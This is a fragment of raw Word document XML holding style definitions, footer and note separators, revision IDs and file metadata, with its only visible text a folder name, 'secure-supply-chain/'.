          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secure-supply-chain/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E7149" w:rsidRPr="00F416E0">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D75A2" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="0041753F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55C1F631" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="004175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568171"/>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="4C8B42BF" w14:textId="77777777" w:rsidR="006E7149" w:rsidRDefault="005E06C9">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E71C43">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="158C8104" w14:textId="77777777" w:rsidR="006E7149" w:rsidRDefault="006E71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55053" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="0041753F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55C10634" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="004175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D10C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="398D1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abstractNum>
  <w:num w:numId="1" w16cid:durableId="1282498087">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D66523C"/>
    <w:rsid w:val="00064D5F"/>
    <w:rsid w:val="00212ECC"/>
    <w:rsid w:val="00221CB0"/>
    <w:rsid w:val="0041753F"/>
    <w:rsid w:val="005A47F1"/>
    <w:rsid w:val="005E06C9"/>
    <w:rsid w:val="006B1CDA"/>
    <w:rsid w:val="006E7149"/>
    <w:rsid w:val="00820749"/>
    <w:rsid w:val="0084757B"/>
    <w:rsid w:val="00E71C43"/>
    <w:rsid w:val="00F218A3"/>
    <w:rsid w:val="00F416E0"/>
    <w:rsid w:val="ED665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3582F1"/>
  <w15:docId w15:val="{1DD9BAA4-1C83-47E0-80B4-FDB0DBF2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513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>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rsid w:val="00E71C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E71C43"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:kern w:val="2"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="00F416E0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="00F416E0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="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6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4</Pages>
  <Words>140</Words>
  <Characters>800</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Hewlett-Packard</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WPS_1744696111</dc:creator>
  <cp:lastModifiedBy>FACULTY 3</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-15T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-08T06:23:00Z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3D23D10EC35AA670B430EF684744DDAA_41</vt:lpwstr>
  </property>
</Properties>
</file>